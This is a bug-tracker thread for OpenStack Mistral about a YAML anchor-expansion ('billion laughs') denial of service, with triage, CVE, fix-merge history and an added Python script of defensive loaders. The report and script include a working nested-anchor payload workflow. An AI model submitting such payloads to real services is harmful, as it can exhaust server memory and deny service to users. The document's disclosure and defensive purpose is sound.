Denial of service through YAML anchors expansion (Billion Laughs)

Bug #1785657 reported by Nassim
Affects: Mistral
Status: Fix Released
Importance: High
Assigned to: Eyal B

Bug Description

It is possible to perform a denial of service on a Mistral server by submitting a malicious workflow definition file (YAML) that contains nested anchors. This looks exactly like an XML Entity Expansion attack (https://en.wikipedia.org/wiki/Billion_laughs_attack).

Example of a malicious workflow below:

version: '2.0'

wf1:
  type: direct

  input:
    - a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
    - b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
    - c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
    - d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
    - e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
    - f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
    - g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
    - h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
    - i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]

  tasks:
    hello:
      action: std.echo output="Hello"
      wait-before: 1
      publish:
        result: <% task(hello).result %>
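
Added example, not part of the original report and not Mistral's code: the Python script below reproduces the expansion the report describes and shows two ways to stop it. It embeds the workflow above as a constructed string, computes how many scalar values the document would contain once every alias is expanded (without performing the expansion: PyYAML's composer shares one node object per anchor, so a memoised walk over the node graph is linear), and then parses through a SafeLoader subclass that rejects anchors and aliases in the scanner, which is the approach the fix merged later in this thread takes, alongside a bounded loader that keeps aliases but refuses any document whose expanded size exceeds a limit. The names NoAliasLoader, YAMLExpansionError, count_leaves, expanded_leaf_count, load_without_aliases, load_bounded and is_rejected are helper names assumed for this example, and the two workflow strings are constructed sample input.

```python
import yaml

# Constructed input in the shape of the reported workflow: nine anchored
# levels, each a flow sequence of nine aliases to the level below.
MALICIOUS_WORKFLOW = """\
version: '2.0'
wf1:
  type: direct
  input:
    - a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
    - b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
    - c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
    - d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
    - e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
    - f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
    - g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
    - h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
    - i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
  tasks:
    hello:
      action: std.echo output="Hello"
      wait-before: 1
      publish:
        result: <% task(hello).result %>
"""

# Constructed anchor-free workflow: the loaders must still accept this.
BENIGN_WORKFLOW = """\
version: '2.0'
wf1:
  type: direct
  tasks: {hello: {action: std.echo output="Hello"}}
"""


class YAMLExpansionError(yaml.YAMLError):
    """Hypothetical error: the document uses, or would expand, aliases too far."""


class NoAliasLoader(yaml.SafeLoader):
    """SafeLoader that refuses '&anchor' and '*alias' in the scanner, before any
    node exists. Only the pure-Python scanner is affected; CSafeLoader bypasses it."""

    def fetch_anchor(self):
        raise YAMLExpansionError(f"anchor not allowed (line {self.get_mark().line + 1})")

    def fetch_alias(self):
        raise YAMLExpansionError(f"alias not allowed (line {self.get_mark().line + 1})")


def count_leaves(root):
    """Scalars in the fully expanded tree. The composer reuses one node object per
    anchor, so memoising on node identity keeps this linear however big the expansion."""
    memo = {}
    def leaves(node):
        if id(node) in memo:
            return memo[id(node)]
        if isinstance(node, yaml.ScalarNode):
            total = 1
        elif isinstance(node, yaml.SequenceNode):
            total = sum(leaves(item) for item in node.value)
        else:  # MappingNode: keys and values both expand
            total = sum(leaves(k) + leaves(v) for k, v in node.value)
        memo[id(node)] = total
        return total
    return 0 if root is None else leaves(root)


def expanded_leaf_count(text):
    # Compose only: a cheap shared graph, no Python objects are constructed.
    return count_leaves(yaml.compose(text, Loader=yaml.SafeLoader))


def load_without_aliases(text):
    return yaml.load(text, Loader=NoAliasLoader)


def load_bounded(text, max_leaves=10_000):
    # Aliases stay allowed, but the expanded size is checked on the node graph first.
    loader = yaml.SafeLoader(text)
    try:
        root = loader.get_single_node()
        size = count_leaves(root)
        if size > max_leaves:
            raise YAMLExpansionError(f"expands to {size} scalars (limit {max_leaves})")
        return None if root is None else loader.construct_document(root)
    finally:
        loader.dispose()


def is_rejected(load, text):
    # True when `load` refuses `text` with YAMLExpansionError.
    try:
        load(text)
    except YAMLExpansionError:
        return True
    return False
```

For the workflow in the report the count comes to 9 + 81 + ... + 9^9 list entries plus the handful of scalars around them (435,848,073 in total), far past anything a workflow engine should accept, while the benign document counts nine. Two caveats worth knowing: PyYAML's constructor caches the object built for each node, so yaml.safe_load by itself returns a shared structure and the exponential cost is paid when that structure is later serialised (json.dumps), deep-copied or walked by a validator, which is why checking the node graph before construction is the right place; and the scanner override only applies to the pure-Python SafeLoader, so a service using CSafeLoader (libyaml) needs the composed-graph check, which works with either loader.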

Dougal Matthews (d0ugal)
Changed in mistral:
status: New → Confirmed
importance: Undecided → High
milestone: none → rocky-rc2
status: Confirmed → Incomplete
Revision history for this message
Dougal Matthews (d0ugal) wrote :

Sorry, I just re-read this. I see this is related to YAML. Not YAQL. I have hidden my previous comment as it was confusing.

Changed in mistral:
status: Incomplete → Confirmed
Dougal Matthews (d0ugal)
Changed in mistral:
milestone: rocky-rc2 → stein-1
Dougal Matthews (d0ugal)
tags: added: security
Nassim (nassim-abbaoui) wrote :

Not sure how security issues are usually handled here; will there be a CVE assigned to help with tracking / identifying vulnerable versions?

James Hebden (ec0) wrote :

I have requested CVE-2018-16848 for this issue, which is currently embargoed. Once this bug is made public, we can make the CVE public, too.

Dougal Matthews (d0ugal)
Changed in mistral:
milestone: stein-1 → stein-2
Changed in mistral:
milestone: stein-2 → stein-3
Changed in mistral:
milestone: stein-3 → train-1
Renat Akhmerov (rakhmerov) wrote :

It's a serious one. There are also other ways to deny the service. We'll see what kind of protections to apply against such things.

Changed in mistral:
milestone: train-1 → ussuri-1
Changed in mistral:
milestone: ussuri-1 → ussuri-2
assignee: nobody → Eyal B (eyalb1)
status: Confirmed → In Progress
status: In Progress → Fix Released
Joshua Padman (jpadman) wrote :

Can we make this bug public now?

I don't think there is much value served in keeping it private. Those that are looking will know about this issue with regard to YAML, and those that aren't looking as much (operating cloud platforms) probably won't know about the potential risks.

Nassim (nassim-abbaoui) wrote :

Sounds right

information type: Private Security → Public Security
OpenStack Infra (hudson-openstack) wrote : Fix proposed to mistral (stable/train)

Fix proposed to branch: stable/train
Review: https://review.opendev.org/736158

OpenStack Infra (hudson-openstack) wrote : Fix proposed to mistral (stable/stein)

Fix proposed to branch: stable/stein
Review: https://review.opendev.org/736161

OpenStack Infra (hudson-openstack) wrote : Fix proposed to mistral (stable/rocky)

Fix proposed to branch: stable/rocky
Review: https://review.opendev.org/736163

OpenStack Infra (hudson-openstack) wrote : Fix merged to mistral (stable/train)

Reviewed: https://review.opendev.org/736158
Committed: https://git.openstack.org/cgit/openstack/mistral/commit/?id=f0824730fcc4bed3614071be2a1fc82a0ed29114
Submitter: Zuul
Branch: stable/train

commit f0824730fcc4bed3614071be2a1fc82a0ed29114
Author: Eyal <email address hidden>
Date: Thu Dec 12 14:49:13 2019 +0200

    Disable the use of anchors when parsing yaml

    This can be used as a DDoS attack

    Closes-Bug: 1785657
    Change-Id: Icf460fea113e9279715cae87df3ef88a77575e04
    (cherry picked from commit eac23d9e774f658f9d4743c99aa2743eb104c3f9)

tags: added: in-stable-train
OpenStack Infra (hudson-openstack) wrote : Fix merged to mistral (stable/rocky)

Reviewed: https://review.opendev.org/736163
Committed: https://git.openstack.org/cgit/openstack/mistral/commit/?id=2968b8bbb743ada6df7e36c969228bef42830224
Submitter: Zuul
Branch: stable/rocky

commit 2968b8bbb743ada6df7e36c969228bef42830224
Author: Eyal <email address hidden>
Date: Thu Dec 12 14:49:13 2019 +0200

    Disable the use of anchors when parsing yaml

    This can be used as a DDoS attack

    Closes-Bug: 1785657
    Change-Id: Icf460fea113e9279715cae87df3ef88a77575e04

tags: added: in-stable-rocky
tags: added: in-stable-stein
OpenStack Infra (hudson-openstack) wrote : Fix merged to mistral (stable/stein)

Reviewed: https://review.opendev.org/736161
Committed: https://git.openstack.org/cgit/openstack/mistral/commit/?id=3c2e35722a44c83bfca68ba17e0e748bf53aa05c
Submitter: Zuul
Branch: stable/stein

commit 3c2e35722a44c83bfca68ba17e0e748bf53aa05c
Author: Eyal <email address hidden>
Date: Thu Dec 12 14:49:13 2019 +0200

    Disable the use of anchors when parsing yaml

    This can be used as a DDoS attack

    Closes-Bug: 1785657
    Change-Id: Icf460fea113e9279715cae87df3ef88a77575e04

OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/mistral rocky-eol

This issue was fixed in the openstack/mistral rocky-eol release.

OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/mistral stein-eol

This issue was fixed in the openstack/mistral stein-eol release.

OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/mistral train-eol

This issue was fixed in the openstack/mistral train-eol release.
